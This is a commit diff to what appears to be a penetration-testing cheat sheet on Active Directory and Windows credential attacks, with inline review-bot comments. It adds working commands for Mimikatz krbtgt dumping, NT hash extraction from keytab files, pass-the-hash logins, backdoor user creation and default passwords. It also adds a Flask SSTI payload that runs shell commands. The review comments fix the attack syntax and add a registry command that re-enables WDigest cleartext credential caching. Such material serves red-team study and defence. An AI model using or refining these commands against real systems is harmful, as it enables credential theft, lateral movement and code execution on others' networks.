krb5.keytab + credential use summary

Swissky 2019-10-20 13:25:06 +02:00
parent 7159a3ded3
commit ed252df92e
4 changed files with 97 additions and 24 deletions


@ -13,6 +13,7 @@
* Using vssadmin * Using vssadmin
* Using DiskShadow * Using DiskShadow
* Using Mimikatz DCSync * Using Mimikatz DCSync
* Using Mimikatz sekurlsa
* [Password in AD User comment](#password-in-ad-user-comment) * [Password in AD User comment](#password-in-ad-user-comment)
* [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
* [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
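Review bot: the new `* Using Mimikatz sekurlsa` entry, like the three `Using ...` entries above it, is plain text while every other summary item is a link; since this commit also adds a `#### Using Mimikatz sekurlsa` heading, make it `* [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)` (and consider doing the same for the vssadmin, DiskShadow and DCSync entries) so the summary actually navigates.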
@ -28,6 +29,7 @@
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
* [PrivExchange attack](#privexchange-attack) * [PrivExchange attack](#privexchange-attack)
* [Password spraying](#password-spraying) * [Password spraying](#password-spraying)
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
* [PXE Boot image attack](#pxe-boot-image-attack) * [PXE Boot image attack](#pxe-boot-image-attack)
## Tools ## Tools
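Review bot: the anchor `#extract-accounts-from-etc-krb5-keytab` will not resolve on GitHub, which drops `/` and `.` from heading slugs instead of turning them into hyphens; the heading `### Extract accounts from /etc/krb5.keytab` added later in this commit yields `#extract-accounts-from-etckrb5keytab`, so either the link should use that slug or the heading should be reworded to avoid the path characters.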
@ -393,6 +395,15 @@ mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
#### Using Mimikatz sekurlsa
Dumps credential data in an Active Directory domain when run on a Domain Controller.
:warning: Requires administrator access with debug or Local SYSTEM rights
```powershell
sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt
```
### Password in AD User comment ### Password in AD User comment
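Review bot: the second command, `lsadump::lsa /inject /name:krbtgt`, belongs to the lsadump module, not sekurlsa, so either the `#### Using Mimikatz sekurlsa` heading is too narrow or that line belongs beside the `lsadump::dcsync /domain:htb.local /user:krbtgt` example above it. The description `Dumps credential data in an Active Directory domain when run on a Domain Controller` also reads as if both lines dump the whole domain, whereas both target the single `krbtgt` principal named in the commands; say so, and show `privilege::debug` before them, since the `:warning:` line says debug rights are required but the block never acquires them. Minor: the block is mimikatz console input, not PowerShell, so the ```powershell tag is misleading.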
@ -902,6 +913,30 @@ Most of the time the best passwords to spray are :
- Welcome1 - Welcome1
- $Companyname1 - $Companyname1
### Extract accounts from /etc/krb5.keytab
The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure.
Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user.
```powershell
$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
[...]
[26] Service principal: host/COMPUTER@DOMAIN
KVNO: 25
Key type: 23
Key: 6b3723410a3c54692e400a5862256e0a
Time stamp: Oct 07, 2019 09:12:02
[...]
```
Connect to the machine using the account and the hash with CME.
```powershell
$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN"
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a
```
### PXE Boot image attack ### PXE Boot image attack
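Review bot: the CrackMapExec invocation `crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b37..." -d "DOMAIN"` omits the protocol subcommand that current CME requires and that the other file in this same commit uses (`cme smb 172.16.157.0/24 -u administrator -H ...`); it should read `crackmapexec smb 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN"`. Two smaller points: the `klist` link goes to an AdoptOpenJDK download page without saying why, so state that the `-t -K -e -k FILE:` syntax and the `[26] Service principal: ... Key type: 23` output shown come from the JDK's `klist.exe`, because the section is titled after a Linux `/etc/krb5.keytab` and a reader will reach for MIT `klist` (whose `-k -K -e` prints the same keys in a different layout) first; and `Key type: 23` should be named as `rc4-hmac`, whose key is the NT hash of the account's password, which is why the `host/COMPUTER@DOMAIN` entry is usable as `COMPUTER$` in the pass-the-hash login below, whereas AES entries (etype 17/18) from the same keytab cannot be used for NTLM pass-the-hash.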
@ -1006,3 +1041,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
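Review bot: the last reference, `Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon`, is missing the colon in the title (`Taming the Beast: Assess Kerberos-Protected Networks`) and, unlike the other entries in this list, has no date; the URL itself (`bh-europe-09`) gives it, so `- Black Hat Europe 2009` can be appended to match the `Title - Author - Date` form used by the entry above it.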


@ -24,6 +24,10 @@ mimikatz # sekurlsa::wdigest
```powershell ```powershell
mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest mimikatz_command -f sekurlsa::wdigest
# to re-enable wdigest in Windows Server 2012+
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD 'UseLogonCredential' with the value 1.
``` ```
## Mimikatz - Mini Dump ## Mimikatz - Mini Dump
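Review bot: the three new `#` lines describe a registry change but give no command, inside a block whose other lines are runnable `mimikatz_command` invocations; add the actual one-liner, e.g. `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f`, and note that the value only affects logons that happen after it is set, so `sekurlsa::wdigest` will still show nothing for sessions that were already established until the user logs on again (or locks and unlocks). `Windows Server 2012+` is also narrower than the truth: `UseLogonCredential` is honoured natively on Windows 8.1 / Server 2012 R2 and later, and on Windows 7 / 8 / Server 2008 R2 / 2012 once KB2871997 is installed.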
@ -108,3 +112,4 @@ More informations can be grabbed from the Memory with :
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
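Review bot: the new reference's author and date are formatted as `5TH DECEMBER 2017 - ACOUCH`, apparently copied from the blog's uppercase byline, while the existing entries use normal case and `Title - Author` order; `Adam Couch - December 5, 2017` (the author behind adamcouch.co.uk) matches the rest of the list.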


@ -1,6 +1,25 @@
# Windows - Using credentials # Windows - Using credentials
## TIP 1 - Create your credential :D ## Summary
* [TIPS](#tips)
* [TIP 1 - Create your credential](#tip-1-create-your-credential)
* [TIP 2 - Retail Credential](#tip-2-retail-credential)
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
* [Metasploit](#metasploit)
* [Metasploit - SMB](#metasploit-smb)
* [Metasploit - Psexec](#metasploit-psexec)
* [Crackmapexec](#crackmapexec)
* [Winexe](#winexe)
* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py)
* [PsExec - Sysinternal](#psexec-sysinternal)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Netuse](#netuse)
* [Runas](#runas)
## TIPS
### TIP 1 - Create your credential
```powershell ```powershell
net user hacker hacker1234* /add net user hacker hacker1234* /add
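Review bot: most of the new summary anchors will not resolve once rendered on GitHub, because GitHub keeps the literal ` - ` in a heading as three hyphens and strips `.` and `/`: `TIP 1 - Create your credential` becomes `#tip-1---create-your-credential` (same pattern for TIP 2, TIP 3, `Metasploit - SMB`, `Metasploit - Psexec` and `PsExec - Sysinternal`), and `Psexec.py / Smbexec.py / Wmiexec.py` becomes `#psexecpy--smbexecpy--wmiexecpy`, not `#psexec.py---smbexec.py---wmiexec.py`. The TIP 3 entry additionally carries a typo in its anchor, `#tip-3-sandbox-credrential-wdagutilityaccount`. Either correct the slugs or drop the ` - ` from the headings so the simpler anchors become right; the entries that already work as written are `#tips`, `#metasploit`, `#crackmapexec`, `#winexe`, `#rdp-remote-desktop-protocol`, `#netuse` and `#runas`.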
@ -17,7 +36,9 @@ net user /dom
net user /domain net user /domain
``` ```
## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) ### TIP 2 - Retail Credential
Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin
@ -26,7 +47,9 @@ Username: RetailAdmin
Password: trs10 Password: trs10
``` ```
## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) ### TIP 3 - Sandbox Credential - WDAGUtilityAccount
WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
@ -37,7 +60,9 @@ Password: pw123
``` ```
## Metasploit - SMB ## Metasploit
### Metasploit - SMB
```c ```c
use auxiliary/scanner/smb/smb_login use auxiliary/scanner/smb/smb_login
@ -49,7 +74,7 @@ run
creds creds
``` ```
## Metasploit - Psexec ### Metasploit - Psexec
Note: the password can be replaced by a hash to execute a `pass the hash` attack. Note: the password can be replaced by a hash to execute a `pass the hash` attack.
@ -63,27 +88,27 @@ run
shell shell
``` ```
## Crackmapexec (Integrated to Kali) ## Crackmapexec
```python ```python
git clone https://github.com/byt3bl33d3r/CrackMapExec.github git clone https://github.com/byt3bl33d3r/CrackMapExec.github
python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
``` # pass the hash
## Crackmapexec (Pass The Hash)
```powershell
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
``` ```
## Winexe (Integrated to Kali) ## Winexe
Integrated to Kali
```python ```python
winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
``` ```
## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) ## Psexec.py / Smbexec.py / Wmiexec.py
from Impacket
```python ```python
git clone https://github.com/CoreSecurity/impacket.git git clone https://github.com/CoreSecurity/impacket.git
@ -95,7 +120,16 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10
# switch admin user to NT Authority/System # switch admin user to NT Authority/System
``` ```
## RDP Remote Desktop Protocol (Impacket) ## PsExec - Sysinternal
from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)
```powershell
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
```
## RDP Remote Desktop Protocol
```powershell ```powershell
python rdpcheck.py DOMAIN/username:password@10.10.10.10 python rdpcheck.py DOMAIN/username:password@10.10.10.10
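Review bot: in the moved PsExec block, `PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s` places `-s` after the program name, where PsExec passes it to `cmd.exe` as an argument instead of treating it as its own run-as-SYSTEM switch; PsExec options must precede the command, so the line should be `PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password -s cmd.exe`. In the Crackmapexec block the `cme smb ... --local-auth` pass-the-hash line has been merged into a fence whose other two commands use the old `python crackmapexec.py <target> -d ... -u ... -p ...` form without the `smb` subcommand, so the block now mixes two incompatible CLI syntaxes; update the first two to `cme smb ...` as well, and fix `CrackMapExec.github` to `CrackMapExec.git` in the clone line while there. The ```python tags on these shell-command blocks (Crackmapexec, Winexe, Impacket) should be ```bash or similar, and dropping `(Integrated to Kali)` from the Crackmapexec heading while keeping `Integrated to Kali` under Winexe is inconsistent.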
@ -139,24 +173,20 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1
``` ```
## Netuse (Windows) ## Netuse
Windows only
```powershell ```powershell
net use \\ordws01.cscou.lab /user:DOMAIN\username password net use \\ordws01.cscou.lab /user:DOMAIN\username password
C$ C$
``` ```
## Runas (Windows - Kerberos auth) ## Runas
```powershell ```powershell
runas /netonly /user:DOMAIN\username "cmd.exe" runas /netonly /user:DOMAIN\username "cmd.exe"
``` runas /noprofil /netonly /user:DOMAIN\username cmd.exe
## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
```powershell
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
``` ```
## References ## References
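Review bot: `runas /noprofil /netonly /user:DOMAIN\username cmd.exe` misspells the switch; runas documents `/noprofile` (and `/profile`), so spell it out. Worth keeping from the old heading `Runas (Windows - Kerberos auth)` is a caveat that `/netonly` does not validate the supplied credentials at launch: the new `cmd.exe` runs as the current local user (`whoami` will not change) and the `DOMAIN\username` credentials are only used, and only then checked, when the process touches a network resource, so a wrong password shows up as access denied on the first `net use` or `dir \\host\share`, not as a runas error.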


@ -288,6 +288,7 @@ nv -lnvp 8000
```python ```python
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
``` ```
#### Exploit the SSTI by calling Popen without guessing the offset #### Exploit the SSTI by calling Popen without guessing the offset
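Review bot: the added payload `{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}` is Flask-specific, not generic Jinja2: it relies on the `config` object that Flask injects into the template context and on `flask.config` importing `os`, so it fails on Jinja2 used outside Flask or when `config` is not in the context. It also does not depend on guessing the `__subclasses__()[396]` index that the line above it needs, so it fits better under the `#### Exploit the SSTI by calling Popen without guessing the offset` heading that follows than next to the offset-based payload; wherever it lands, add a comment saying it is Flask-only.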